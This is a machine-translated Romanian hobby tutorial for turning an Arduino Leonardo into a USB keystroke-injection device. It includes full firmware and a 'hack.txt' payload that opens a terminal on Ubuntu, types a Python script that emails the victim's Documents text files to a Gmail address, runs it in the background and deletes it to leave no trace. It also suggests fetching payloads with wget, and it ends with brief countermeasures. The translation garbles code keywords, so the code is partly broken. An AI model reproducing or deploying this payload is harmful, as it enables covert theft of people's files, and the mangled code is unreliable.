Cuprins:
2025 Autor: John Day | [email protected]. Modificat ultima dată: 2025-01-23 15:04
În acest proiect vom folosi un arduino leonardo pentru a simula un posibil atac USB folosind HID (dispozitiv de interfață umană).
Am creat acest tutorial nu pentru a ajuta hackerii, ci pentru a vă arăta câteva pericole reale și cum să vă protejați de acele pericole. Acest dispozitiv nu este un dispozitiv care poate fi utilizat pe orice platformă pentru hackeri, este mai degrabă o dovadă a conceptului în detaliu.
Vom învăța următoarele:
- cum se utilizează arduino leonardo pentru a emula tastatura
- cum să citiți datele de pe cardurile SD
- cum să creați un script python care scanează fișierele și le trimite prin e-mail
- cum să vă protejați de dispozitivele de hacking USB
Pasul 1: Materiale
Părți:
1. Arduino leonardo
2. cititor de carduri micro USB
3. câteva SD card SD
4. buton ca acesta (VCC, masă și semnal)
5. cabluri jumper feminin-masculin și feminin-feminin
6. cablu micro USB la USB
Pasul 2: Construirea dispozitivului
Înainte de instrucțiunile de construcție, să analizăm principiul de funcționare:
Arduino Leonardo se poate comporta ca un dispozitiv de interfață umană (HID) și, prin urmare, poate emula mouse-ul și tastatura. Vom folosi această caracteristică pentru a deschide un terminal (în UBUNTU linux) și pentru a scrie un mic script care va accesa / dosarul Documente din folderul de acasă al utilizatorului copiază fișierele.txt de acolo și le trimite prin e-mail cuiva. Dacă doriți să aflați mai multe detalii, verificați pasul următor.
Deoarece este un dispozitiv demonstrativ, lucrurile sunt foarte simple, nu vom lipi nimic.
Instrucțiuni de construcție
Înainte de a începe, verificăm fișierele atașate, am atașat schemele fritzing și toate fișierele necesare
1. Asamblați componentele:
* conectați cablul micro USB la arduino
* conectați comutatorul cu cheie la arduino (masă, vcc și modul de ieșire la D8)
* conectați cititorul de carduri la arduino (folosind antetul ICSP). Arduino Leonardo nu are antetul ICSP conectat la pinii digitali, deci va trebui să conectați cititorul de carduri la antetul ICSP. Puteți găsi câteva desene ale ICSP aici: https://learn.sparkfun.com/tutorials/installing-an…. Conectați pinul SS la pinul digital 10
2. obțineți codul arduino, puteți clona depozitul meu arduino pe github: https://github.com/danionescu0/arduino și accesați projects / keyboard_exploit sau obțineți-l de mai jos:
#include „Keyboard.h”
#include "SPI.h" #include "SD.h" String filenameOnCard = "hack.txt"; String sleepCommandStartingPoint = "Sleep::"; String commandStartingPoint = "Command::"; int delayBetweenCommands = 10; const int buttonPin = 8; const int chipSelect = 10; int previousButtonState = HIGH; void setup () {pinMode (buttonPin, INPUT); Serial.begin (9600); Keyboard.begin (); if (! SD.begin (chipSelect)) {Serial.println ("Cardul a eșuat sau nu este prezent!"); întoarcere; }} void loop () {int buttonState = digitalRead (buttonPin); if ((buttonState! = previousButtonState) && (buttonState == HIGH)) {sdFileToKeyboard (); Serial.println („Încărcat!”); întârziere (500); } previousButtonState = buttonState; } void sdFileToKeyboard () {File dataFile = SD.open (filenameOnCard); if (! dataFile) {Serial.println ("Numele de fișier specificat nu este prezent pe cardul SD, verificați fișierulOnCard!"); } Linie de șir; while (dataFile.available ()) {line = dataFile.readStringUntil ('\ n'); Serial.println (linie); sendToKeyboard (line); } dataFile.close (); } void sendToKeyboard (String line) {String WorkingLine = line; if (workingLine.indexOf (sleepCommandStartingPoint)! = -1) {sleepFor (line); întoarcere; } if (workingLine.indexOf (commandStartingPoint) == -1) {Serial.print ("Text:"); Serial.println (line); Keyboard.println (linie); apasa Enter(); întoarcere; } Serial.println ("Comandă:"); int charPosition = commandStartingPoint.length (); int lineLength = line.length (); WorkingLine + = ","; while (WorkingLine! = "") {workingLine = workingLine.substring (charPosition); Serial.print ("WorkingLine:"); Serial.println (WorkingLine); int specialCommandDelimiterPosition = WorkingLine.indexOf (","); Comanda String = WorkingLine.substring (0, specialCommandDelimiterPosition); charPosition = specialCommandDelimiterPosition + 1; if (comanda! = "") {Serial.print ("Comandă găsită:"); Serial.println (comandă); Keyboard.press (getCommandCode (comandă)); delay (delayBetweenCommands); }} Keyboard.releaseAll (); delay (delayBetweenCommands); } void pressEnter () {Keyboard.press (KEY_RETURN); Keyboard.releaseAll (); } void sleepFor (String line) {int sleepAmount = line.substring (sleepCommandStartingPoint.length (), line.length ()). toInt (); Serial.print ("Sleeping for:"); Serial.println (sleepAmount); întârziere (sleepAmount); } char getCommandCode (text șir) {char textCharacters [2]; text.toCharArray (textCharacters, 2); cod char = textCaractere [0]; cod = (text == "KEY_LEFT_CTRL")? KEY_LEFT_CTRL: cod; cod = (text == "KEY_LEFT_SHIFT")? KEY_LEFT_SHIFT: cod; cod = (text == "KEY_LEFT_ALT")? KEY_LEFT_ALT: cod; cod = (text == "KEY_UP_ARROW")? KEY_UP_ARROW: cod; cod = (text == "KEY_DOWN_ARROW")? KEY_DOWN_ARROW: cod; cod = (text == "KEY_LEFT_ARROW")? KEY_LEFT_ARROW: cod; cod = (text == "KEY_RIGHT_ARROW")? KEY_RIGHT_ARROW: cod; cod = (text == "KEY_RIGHT_GUI")? KEY_RIGHT_GUI: cod; cod = (text == "KEY_BACKSPACE")? KEY_BACKSPACE: cod; cod = (text == "KEY_TAB")? KEY_TAB: cod; cod = (text == "KEY_RETURN")? KEY_RETURN: cod; cod = (text == "KEY_ESC")? KEY_ESC: cod; cod = (text == "KEY_INSERT")? KEY_INSERT: cod; cod = (text == "KEY_DELETE")? KEY_DELETE: cod; cod = (text == "KEY_PAGE_UP")? KEY_PAGE_UP: cod; cod = (text == "KEY_PAGE_DOWN")? KEY_PAGE_DOWN: cod; cod = (text == "KEY_HOME")? KEY_HOME: cod; cod = (text == "KEY_END")? KEY_END: cod; cod = (text == "KEY_CAPS_LOCK")? KEY_CAPS_LOCK: cod; cod = (text == "KEY_F1")? KEY_F1: cod; cod = (text == "KEY_F2")? KEY_F2: cod; cod = (text == "KEY_F3")? KEY_F3: cod; cod = (text == "KEY_F4")? KEY_F4: cod; cod = (text == "KEY_F5")? KEY_F5: cod; cod = (text == "KEY_F6")? KEY_F6: cod; cod = (text == "KEY_F7")? KEY_F7: cod; cod = (text == "KEY_F8")? KEY_F8: cod; cod = (text == "KEY_F9")? KEY_F9: cod; cod = (text == "KEY_F10")? KEY_F10: cod; cod = (text == "KEY_F11")? KEY_F1: cod; cod = (text == "KEY_F12")? KEY_F2: cod;
cod retur;
}
3. Încărcați codul pe arduino, asigurați-vă că selectați 9600 baud rate, portul serial și arduino leonardo
4. Formatați cardul SD folosind FAT16 sau FAT32
5. Dacă ați clonat repozitia github de mai sus, copiați fișierul hack.txt pe card, dacă nu fișierul este listat mai jos:
Command:: KEY_LEFT_CTRL, KEY_LEFT_ALT, tSleep:: 500 vi hack.py Sleep:: 300 Command:: KEY_INSERT import smtplib import glob, os from os.path import expanduser from email. MIMEMultipart import MIMEMultipart from email. MIMEBase import MIMEBase from email. MIMEText import MIMEText din e-mail. Utilizează import COMMASPACE, formatează data din e-mail import Codificatori
smtp_user = 'sender_gmail_address'
smtp_pass = 'sender_gmail_password' to_address = 'receiver_address' scan_documents_location = 'Documente'
subject = body = 'Fișiere de pe computerul spart'
header = 'Către: {0} nDe la: {1} nSubiect: {2} n'.format (to_address, smtp_user, subject)
send sendMail (către, subiect, text, fișiere = ):
msg = MIMEMultipart () msg ['From'] = smtp_user msg ['To'] = COMMASPACE.join (to) msg ['Date'] = formatdate (localtime = True) msg ['Subject'] = subject msg.attach (MIMEText (text)) pentru fișier în fișiere: parte = MIMEBase („aplicație”, „octet-stream”) part.set_payload (deschis (fișier, „rb”). Read ()) Codificatori.encode_base64 (parte) parte. add_header ('Content-Disposition', 'attachment; filename = "% s"'% os.path.basename (file)) msg.attach (part)
server = smtplib. SMTP ('smtp.gmail.com:587')
server.starttls () server.login (smtp_user, smtp_pass) server.sendmail (smtp_user, to, msg.as_string ()) server.quit ()
sendMail ([to_address], subject, body, glob.glob ("{0} / {1} / *. txt".format (expanduser ("~"), scan_documents_location)))
Sleep:: 50 Command:: KEY_ESC Sleep:: 100: x Sleep:: 500 nohup python hack.py & Sleep:: 700 rm -rf hack.py Sleep:: 400 Command:: KEY_LEFT_ALT, KEY_F4
6. Editați următoarele linii:
smtp_user = 'sender_email_addr'
smtp_pass = 'sender_password' to_address = 'receiver_address'
Și înlocuiți cu adresele dvs. de e-mail
7. Scoateți cardul și introduceți-l în cititorul de carduri arduino
Pasul 3: Cum funcționează în detalii
Cum va funcționa atacul:
1. Când butonul este apăsat, Leonardo va citi cardul SD folosind un cititor de card SD. Un fișier special care conține taste și combinație de taste va fi prezent pe card. Numele fișierului este „hack.txt”.
Fișierul poate conține text brut și va fi trecut la tastatură așa cum este.
De asemenea, poate conține comenzi speciale precum „Sleep::” și „Command::”.
O linie de genul:
Somn:: 200 înseamnă un somn de 200 ms
O linie de genul:
Comandă:: KEY_LEFT_CTRL, KEY_LEFT_ALT, t înseamnă ctrl stânga apăsat, alt stânga apăsat, t apăsat și toate eliberate
Puteți verifica toate cheile speciale aici:
2. Leonardo va citi rând cu rând și va interpreta comenzile și va emula tastele de pe tastatură. Fișierul „hack.txt” conține o combinație de chei care face următoarele (pentru UBUNTU linux):
A. deschide un terminal (CTRL + ALT + T)
b. deschide un fișier python pentru crearea utilizând vi (scrie „vi hack.py”
c. scrie un script python în interior, care colectează toate fișierele text din folderul principal al documentelor și le trimite la o adresă Gmail specificată
d. rulează fișierul în fundal („nohup python hack.py &”)
e. șterge fișierul (rm -rf hack.py)
f. închide terminalul (ALT + F4)
Toată treaba asta rulează în câteva secunde și nu lasă urme.
Îmbunătățiri și depanare
* Este posibil să observați că, după ce deschid un terminal, scriu fișierul python. o modalitate mai bună de a face acest lucru va fi să-l găzduiți undeva și să-l descărcați folosind comanda „wget some_url”, apoi redenumiți-l în hack.py
* De asemenea, putem descărca sau rula un exploit gata făcut pentru sistemul de operare vizat
* wifi poate fi adăugat la modul, iar hacks pot fi încărcate prin WIFI
* puteți utiliza arduino micro (care este mult mai mic) și puteți încorpora codul de exploatare pe acesta (pentru a-l micșora)
Limitări
1. Deoarece dispozitivul simulat (tastatura și mouse-ul) nu are feedback, nu știm ce se va întâmpla după emiterea unei comenzi care înseamnă că trebuie să folosim întârzieri. De exemplu, emit o comandă pentru a deschide terminalul, dar nu știu când va fi deschis, așa că trebuie să specific o întârziere arbitrară pentru a mă asigura că caracterele tastate după nu se vor pierde.
2. Este posibil să întâmpinăm probleme de permisiune precum lipsa accesului la portul USB sau permisiunea de a instala ceva
3. Viteza de tastare nu este atât de mare pe Leonardo
4. Va funcționa doar pe un sistem de operare vizat (în cazul nostru UBUNTU linux)
În pasul următor vom încerca să găsim modalități de a exploata aceste limitări pentru a împiedica piratarea computerului nostru
Pasul 4: contramăsuri
1. Dezactivarea porturilor USB
- pentru Windows puteți verifica acest tutorial:
2. Dispozitive USB pe lista albă:
- pentru Windows:
2. Blocați computerul când nu sunteți plecat
3. Nu vă conectați ca root (aveți nevoie de parole pentru a instala ceva)
4. Ține-te la curent (actualizări automate activate)
Recomandat:
Prevenirea scurgerilor de gaze domestice folosind Arduino .: 3 pași
Prevenirea scurgerilor de gaze domestice folosind Arduino. GPL este inodor și se adaugă un agent numit Ethyl Mercaptan pentru mirosul său, astfel încât să poată fi observat atunci când există o scurgere
Interfațarea tastaturii cu Arduino. [Metodă unică]: 7 pași (cu imagini)
Interfațarea tastaturii cu Arduino. . Această bibliotecă include cele mai bune caracteristici pe care le
Prevenirea alarmei de amânare: 5 pași
Preveniți alarma de amânare: ați dat vreodată din cap când studiați și doriți să rămâneți treaz, dar nu puteți? Ei bine, fac o mașină grozavă care te poate trezi. Numele său este de a preveni alarma de amânare. Funcționează cu ușurință, puneți alarma în fața biroului, când aveți capul
Demonstrația brațului robotului Reactor Arbotix și Pixycam: 11 pași
Arbotix Reactor Robot Arm și Pixycam Demonstration: Suntem 2 studenți de la colegiul UCN din Danemarca. Ni s-a cerut să facem un lucru de neîncercat ca parte a evaluării noastre pentru clasa, robotul și viziunea noastră. Cerințele proiectului au fost să includă unul sau mai mulți roboți din arbotix și să efectueze o sarcină.Proiect
Prevenirea coliziunilor - Realizat de Pi: 6 pași
Prevenirea coliziunilor - Powered by Pi: Acest instructabil vă va oferi un ghid pas cu pas pentru construirea sistemului de prevenire a coliziunilor. Pentru a începe, trebuie să obțineți următoarea listă de materiale: Raspberry PI 3 (cu acorduri de alimentare și Ethernet), 1 placă de extensie GPIO și Ribbon Cabl